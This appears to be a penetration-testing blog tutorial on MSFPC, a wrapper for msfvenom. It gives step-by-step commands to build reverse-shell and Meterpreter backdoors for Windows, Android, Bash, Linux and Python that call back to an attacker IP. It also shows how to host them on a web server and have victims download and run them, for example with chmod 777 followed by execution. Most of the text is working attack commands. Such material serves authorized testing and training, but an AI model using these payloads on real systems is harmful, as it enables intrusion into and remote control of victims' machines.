Quantcast
Channel: Penetration Testing Archives - Hacking Articles
Viewing all articles
Browse latest Browse all 812

Comprehensive Guide on MSFPC

$
0
0

Hello Friends!!

As you all are aware of MSFvenom-A tool in Kali Linux for generating payload, is also available as MSFvenom Payload Creator (MSFPC) for generating various “basic” Meterpreter payloads via msfvenom. It is fully automating msfvenom & Metasploit is the end goal.

MSFvenom Payload Creator (MSFPC) is a wrapper to generate multiple types of payloads, based on user’s choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.

Source: https://github.com/g0tmi1k/mpc

Author: g0tmi1k

Syntax

msfpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)

Create a Payload with Interactive IP Mode

Let’s create the payload for Windows platform with the help of following command

msfpc windows

When you will enter above command it will automatically confirm the interface:

Which interface should be used?

eth0, lo wan

We press 1 for eth0 and then it will start generating payload and as result give us following:

  1. Location of MSF handler file and windows meterpreter created.
  2. Command to be run to start multi handler automatically within metasploit framework.
  3. Command for file transfer through web server.

 

Basically the msfpc is design to reduce the user’s effort in generating payload of various platforms with different-different format of file. So when you will type “msfpc” it will display all types of platform and generate a specific format of file likewise.

Syntax: msfpc <platform-type> <Lhost IP> <Lport>

Windows Payload

If you want to generate a payload to get meterpreter session victim’s machine which operates on Windows, then all you need to do is type following:

msfpc windows 192.168.1.109 1234

If you will not mention IP, it will automatically ask to choose interface as discussed above and choose 443 as default lport. It creates a malicious backdoor in the .exe format for 32-bit architecture. Then it will start generating the payload and as result give us details following details.

  • Location of MSF handler file and windows meterpreter created: ‘/root/windows-meterpreter-staged-reverse-tcp-1234.exe’
  • command to be run to start multi handler automatically: msfconsole -q -r ‘/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc’
  • Command for file transfer through web server: python2 -m SimpleHTTPServer 8080

 

Now run the following command to launch multi/handler and web server for file transfer.

msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc'
python2 -m SimpleHTTPServer 8080

When victim will browse the following URL where it will ask to download and run the .exe file that will provide meterpreter session to the attacker.

http://192.168.1.109/root/windows-meterpreter-staged-reverse-tcp-1234.exe

Conclusion: Earlier the attackers were using manual method to generate a payload via msfvenom command and then use Metasploit module “multi/handler” to access the reverse connection via meterpreter session and this technique was quite successfully approach to compromise a victim’s machine although took much time. But same approach is applicable with the help of MSFPC for generating various “basic” Meterpreter payloads via msfvenom.

Android Payload

If you want to generate a payload to get meterpreter session victim’s machine which operates on Android, then all you need to do is type following:

msfpc apk 192.168.1.109 1234

It creates a malicious backdoor in the .apk format. Then it will start generating the payload and as result give us following details.

  • Location of MSF handler file and android meterpreter created: ‘/root/android-meterpreter-stageless-reverse-tcp-1234.apk’
  • Command to be run to start multi handler automatically: msfconsole -q -r ‘/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc’
  • Command for file transfer through web server: python2 -m SimpleHTTPServer 8080

Now run the following command to launch multi/handler and web server for file transfer.

msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc'
python2 -m SimpleHTTPServer 8080

When victim will browse the following URL where it will ask to install the application and run the .apk file that will provide meterpreter session to the attacker.

http://192.168.1.109/root/android-meterpreter-stageless-reverse-tcp-1234.apk

Hence you can observe as said above, we have meterpreter session of target’s machine.

BASH

The pro above MSFPC is that it reduces the stress to remember the format for each platform, all we need to do is just follow the above declare syntax and the rest will be managed by MSFPC automatically. Suppose I want to create a payload for Bash platform, and then it will take a few minutes in MSFPC to generate a bash payload.

msfpc bash 192.168.1.109 1234

It creates a malicious backdoor in the .sh format. Then it will start generating the payload and as result give us following:

  • Location of MSF handler file and bash meterpreter created: ‘/root/bash-shell-staged-reverse-tcp-1234.sh.’
  • Command to be run to start multi handler automatically: msfconsole -q -r ‘/root/bash-shell-staged-reverse-tcp-1234.sh.rc’
  • Command for file transfer through web server: python2 -m SimpleHTTPServer 8080

Now run the following command to launch multi/handler and web server for file transfer.

msfconsole -q -r '/root/bash-shell-staged-reverse-tcp-1234.sh.rc'
python2 -m SimpleHTTPServer 8080

When victim will browse the following URL where it will ask to install the script and once the target run the bash script with full permission, it will give command shell.  

http://192.168.1.109/root/bash-shell-staged-reverse-tcp-1234.sh
chmod 777 bash-shell-staged-reverse-tcp-1234.sh
./bash-shell-staged-reverse-tcp-1234.sh

Hence you can observe as said above, we have command shell of target’s machine and with the help of the following command we have upgraded it into meterpreter shell.

sessions -u 1

Linux

If you want to generate a payload to get meterpreter session victim’s machine which operates on Linux, then all you need to do is type following:

msfpc linux 192.168.1.109 4444

It creates a malicious backdoor in the .elf format. Then it will start generating the payload and as result give us following details:

  • Location of MSF handler file and Linux shell created: ‘/root/linux-shell-staged-reverse-tcp-4444.elf
  • Command to be run to start multi handler automatically: msfconsole -q -r ‘/root/linux-shell-staged-reverse-tcp-4444.elf.rc’
  • Command for file transfer through web server: python2 -m SimpleHTTPServer 8080

 

Now run the following command to launch multi/handler and web server for file transfer.

msfconsole -q -r '/root/linux-shell-staged-reverse-tcp-4444.elf.rc'
python2 -m SimpleHTTPServer 8080

When victim will browse the following URL where it will ask to install the application and once the target run the .elf file with full permission, it will give command shell. 

http://192.168.1.109/root/linux-shell-staged-reverse-tcp-4444.elf
chmod 777 linux-shell-staged-reverse-tcp-4444.elf
./linux-shell-staged-reverse-tcp-4444.elf

Hence you can observe as said above, we have command shell of target’s machine and with the help of the following command we have upgraded it into meterpreter shell.

sessions -u 1

Python

If you want to generate a payload to get meterpreter session victim’s machine which operates on Python, then all you need to do is type following:

msfpc python 192.168.1.109 5555

It creates a malicious backdoor in the .py format. Then it will start generating the payload and as result give us following detaisl:

Location of MSF handler file and python meterpreter created: ‘/root/python-meterpreter-staged-reverse_tcp-5555.py

Command to be run to start multi handler automatically: msfconsole -q -r ‘/root/python-meterpreter-staged-reverse_tcp-5555.py.rc’
Command for file transfer through web server: python2 -m SimpleHTTPServer 8080

Now run the following command to launch multi/handler and web server for file transfer.

msfconsole -q -r '/root/python-meterpreter-staged-reverse_tcp-5555.py.rc'
python2 -m SimpleHTTPServer 8080

When victim will browse the following URL where it will ask to install the script and once the target run the python script, it will give meterpreter session. 

http://192.168.1.109/root/python-meterpreter-staged-reverse_tcp-5555.py
python python-meterpreter-staged-reverse_tcp-5555.py

Hence you can observe as said above, we have meterpreter session of target’s machine

Batch (Generates all Possible Combination Payloads)

 Batch is most significant Mode as it generate as much as possible combination of payload. If we want to create all payloads which can give meterpreter session then we can use the following command in that situation.

msfpc msf batch eth0

In the given below command you can observe here it has generated all possible types payload which can give meterpreter sessions. Although the rest technique is as above to execute the payload and get reverse connection.

If we want to create all payloads which can give command shell session of the target’s machine then we can use the following command in that situation.

msfpc cmd batch eth0

In the given below command you can observe here it has generated all possible types payload which can give command shell.

Loop (Generates One payload for Each Platform)

Loop is also most significant mode as it generates on of each type of payload with their default values. Hence by default will generate a payload to provide meterpreter session rather than command shell session.

msfpc verbose loop eth0

In the given below command you can observe here it has generated all possible types payload for each platform which can give meterpreter sessions. Although the rest technique is as above to execute the payload and get reverse connection.

Generating Stageless Payload

As we all know there are two types of payloads i.e. stag and stageless and by default it creates a stage payload. If you want to create a stageless payload then you can go with the following command to generate stageless payload for command shell session or meterpreter session.

msfpc stagless cmd window 192.168.1.109 
msfpc stagless msf  window 192.168.1.109

The rest technique is as above to execute the payload and get reverse connection.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Comprehensive Guide on MSFPC appeared first on Hacking Articles.


Viewing all articles
Browse latest Browse all 812

Trending Articles



<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>